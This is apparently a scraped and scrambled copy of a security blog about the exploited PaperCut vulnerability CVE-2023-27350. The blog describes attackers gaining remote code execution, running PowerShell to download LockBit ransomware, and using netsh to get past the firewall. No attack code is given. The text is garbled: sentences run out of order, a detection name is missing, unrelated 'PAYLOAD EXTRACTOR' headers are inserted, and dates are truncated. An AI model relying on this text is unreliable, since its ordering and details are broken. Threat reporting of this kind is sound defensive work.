Our analysis indicates that the malicious payload enc.exe is the LockBit ransomware (detected by Trend Micro as ), based on the binary found in the user Downloads folder that the malicious actor created. The malicious actors used a temporary hosting site for the malicious payload, one that conveniently deletes all uploaded files after 60 minutes. This PowerShell script downloaded and ran a malicious payload, and used netsh.exe to circumvent the firewall. In this case, the malicious actors chose to run a PowerShell script via the exploited app. Upon the successful exploitation of the vulnerability, pc-app.exe (PaperCut NG/MF) can be used for RCE. Trend Micro Managed XDR observed an instance wherein this vulnerability is believed to have been abused by malicious actors. Based on PaperCut's investigation, the earliest suspicious activity that's possibly related to CVE-2023-27350 dates back to April 14, 2023. On April 18, 2023, a PaperCut customer reported suspicious activity, which suggested that unpatched servers are being exploited through CVE-2023-27350. It can be abused by an unauthenticated attacker to perform RCE on an unpatched PaperCut Application Server. The critical-rated CVE-2023-27350 has a vulnerability severity score of 9.8. This vulnerability is also identified as ZDI-23-233. This blog entry provides an overview of the vulnerabilities and includes information that IT and SOC professionals need to know.ĬVE-2023-27350, which affects PaperCut MF and NG products, was found to have been exploited in the wild (ITW) in the middle of April.
#PAYLOAD EXTRACTOR CODE#
Evidence was found that one of these two vulnerabilities, CVE-2023-27350, is being actively exploited by malicious actors for remote code execution (RCE).
#PAYLOAD EXTRACTOR SOFTWARE#
Trend Micro’s Zero Day Initiative (ZDI) discovered two vulnerabilities, CVE-2023-27350 and CVE-2023-27351, in Papercut, a print management software solution that is used by over 100 million users globally.
We also added Trend Micro Deep Discovery Inspector rules which can help protect against potential exploitation of the vulnerabilities discussed. EDT where we added details on an observed instance through Trend Micro Managed XDR where we believe the vulnerabilities detailed in this blog were abused by threat actors. EDT: We updated the entry to include information on the discovery of LockBit as the malicious payload and add Trend Micro Cloud One™ solutions.
0 kommentar(er)
